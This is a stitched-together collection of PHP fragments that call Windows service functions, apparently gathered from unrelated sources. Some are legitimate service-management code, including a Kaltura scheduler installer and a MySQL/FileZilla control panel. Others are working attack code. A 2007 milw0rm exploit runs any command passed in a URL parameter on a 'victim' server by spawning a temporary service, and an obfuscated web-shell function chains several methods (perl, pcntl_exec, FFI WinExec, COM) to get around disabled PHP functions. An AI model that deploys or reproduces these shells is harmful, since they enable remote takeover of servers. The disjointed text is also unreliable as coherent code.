function srvshelL($command) { $name = whereistmP() . "\\" . uniqid('NJ'); $n = uniqid('NJ'); $cmd = empty($_SERVER['ComSpec']) ? 'd:\\windows\\system32\\cmd.exe' : $_SERVER['ComSpec']; win32_create_service(array('service' => $n, 'display' => $n, 'path' => $cmd, 'params' => "/c {$command} >\"{$name}\"")); win32_start_service($n); win32_stop_service($n); win32_delete_service($n); while (!file_exists($name)) { sleep(1); } $exec = file_get_contents($name); unlink($name); return $exec; }
// First we check the host:port to see if open office is running $sCheckOO = SearchHelper::checkOpenOfficeAvailablity(); if (empty($sCheckOO) && !$restartOO) { // If the check returns empty then it is available on that port so we exit if ($sGiveOutput) { echo 1; } exit; } // Open office appears not to be running or requires a restart if (OS_WINDOWS) { $OOService = 'ktopenoffice'; $default->log->debug('Check Open Office Task: ' . get_current_user()); if ($restartOO) { // If Open office needs to be restarted - stop it here $result_stop = win32_stop_service($OOService); // Wait for the service to stop fully before trying to restart it $continue = false; $cnt = 0; while ($continue === false && $cnt < 15) { $result = win32_query_service_status($OOService); if (isset($result['ProcessId']) && $result['ProcessId'] != 0) { // If there is still a process id then the service has not stopped yet. sleep(2); $continue = false; $cnt++; } else { $continue = true; } } } else {
function stop() { $this->last_error = win32_stop_service($this->name, $this->machine); return $this->last_error === WIN32_NO_ERROR; }
} exit(0); case 'install': win32_create_service(array('service' => $serviceName, 'display' => 'Kaltura asynchronous batch jobs scheduler', 'description' => 'Kaltura asynchronous batch jobs scheduler', 'params' => __FILE__ . " run {$phpPath} {$iniDir}", 'path' => $phpPath, 'start_type' => WIN32_SERVICE_AUTO_START, 'error_control' => WIN32_SERVER_ERROR_NORMAL)); KalturaLog::info('Service Installed'); exit(0); case 'uninstall': win32_delete_service($serviceName); KalturaLog::info('Service Removed'); exit(0); case 'start': win32_start_service($serviceName); KalturaLog::info('Service Started'); exit(0); case 'stop': win32_stop_service($serviceName); KalturaLog::info('Service Stopped'); exit(0); case 'run': win32_start_service_ctrl_dispatcher($serviceName); win32_set_service_status(WIN32_SERVICE_RUNNING); break; case 'debug': set_time_limit(10); break; default: KalturaLog::info('Unkown action'); exit(-1); } $kscheduler = new KGenericScheduler($phpPath, $iniDir); while (1) {
### ### ### Note: Tested on 5.2.1 ### ### ### ### Author: NetJackal ### ### Email: nima_501[at]yahoo[dot]com ### ### Website: http://netjackal.by.ru ### ### ### ### ### ### Usage: http://victim.net/nj.php?CMD=[command] ### ##################################################### $command = isset($_GET['CMD']) ? $_GET['CMD'] : 'dir'; #cammand $dir = ini_get('upload_tmp_dir'); #Directory to store command's output if (!extension_loaded('win32service')) { die('win32service extension not found!'); } $name = $dir . "\\" . uniqid('NJ'); $n = uniqid('NJ'); $cmd = empty($_SERVER['ComSpec']) ? 'd:\\windows\\system32\\cmd.exe' : $_SERVER['ComSpec']; win32_create_service(array('service' => $n, 'display' => $n, 'path' => $cmd, 'params' => "/c {$command} >\"{$name}\"")); win32_start_service($n); win32_stop_service($n); win32_delete_service($n); $exec = file_get_contents($name); unlink($name); echo "<pre>" . htmlspecialchars($exec) . "</pre>"; ?> # milw0rm.com [2007-07-27]
case '重启': win32_restart_service($service->item(0)->getElementsByTagName("mysql")->item(0)->nodeValue); echo '<SCRIPT>alert("MySQL重启命令执行完成")</SCRIPT>'; break; default: break; } switch ($_POST['filezilla']) { case '启动': win32_start_service($service->item(0)->getElementsByTagName("filezilla")->item(0)->nodeValue); echo '<SCRIPT>alert("FileZilla启动命令执行完成")</SCRIPT>'; break; case '停止': win32_stop_service($service->item(0)->getElementsByTagName("filezilla")->item(0)->nodeValue); echo '<SCRIPT>alert("FileZilla停止命令执行完成")</SCRIPT>'; break; case '重启': win32_stop_service($service->item(0)->getElementsByTagName("filezilla")->item(0)->nodeValue); sleep(5); win32_start_service($service->item(0)->getElementsByTagName("filezilla")->item(0)->nodeValue); echo '<SCRIPT>alert("FileZilla重启命令执行完成")</SCRIPT>'; break; default: break; } } else { echo '<hr/>您的服务器没有为PHP安装<b>win32service</b>扩展库,请前往PHP官方站点<a href="http://pecl.php.net/package/win32service">下载安装</a>至php的ext目录当中,并注意要在php.ini中添加<b>extension=php_win32service.dll;</b>语句,最后重新启动nginx生效!<u>注意:请核对好PHP版本</u>'; } ?> </center></body> </html>
function z6v($c) { global $win, $tempdir; $r = ''; if (!empty($c)) { if (!$win) { if (extension_loaded('perl')) { @ob_start(); $p = new perl(); $p->eval("system('{$c}')"); $r = @ob_get_contents(); @ob_end_clean(); } elseif (z7r('pcntl_exec') && z7r('pcntl_fork')) { $r = '[~] Blind Command Execution via [pcntl_exec]\\n\\n'; $o = $tempdir . uniqid('pcntl'); $pid = @pcntl_fork(); if ($pid == -1) { $r .= '[-] Could not fork. Exit'; } elseif ($pid) { $r .= @pcntl_wifexited($status) ? '[+] Done! Command "' . $c . '" successfully executed.' : '[-] Error. Incorrect Command.'; } else { $c = array(" -e 'system(\"{$c} > {$o}\")'"); if (@pcntl_exec('/usr/bin/perl', $c)) { exit(0); } if (@pcntl_exec('/usr/local/bin/perl', $c)) { exit(0); } die; } $r = z9p($o); @unlink($o); } } else { $o = $tempdir . uniqid('NJ'); if (extension_loaded('ffi')) { $a = new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);"); $r = $a->WinExec("cmd.exe /c " . z6l($c) . " >\"{$o}\"", 0); while (!@file_exists($o)) { sleep(1); } $r = z9p($o); } elseif (extension_loaded('win32service')) { $s = uniqid('NJ'); @win32_create_service(array('service' => $s, 'display' => $s, 'path' => 'c:\\windows\\system32\\cmd.exe', 'params' => "/c " . z6l($c) . " >\"{$o}\"")); @win32_start_service($s); @win32_stop_service($s); @win32_delete_service($s); while (!@file_exists($o)) { sleep(1); } $r = z9p($o); } elseif (extension_loaded("win32std")) { @win_shell_execute('..\\..\\..\\..\\..\\..\\..\\windows\\system32\\cmd.exe /c ' . z6l($c) . ' > "' . $o . '"'); while (!@file_exists($o)) { sleep(1); } $r = z9p($o); } else { $a = new COM("WScript.Shell"); $a->Run('c:\\windows\\system32\\cmd.exe /c ' . z6l($c) . ' > "' . $o . '"'); $r = z9p($o); } @unlink($o); } } return $r; }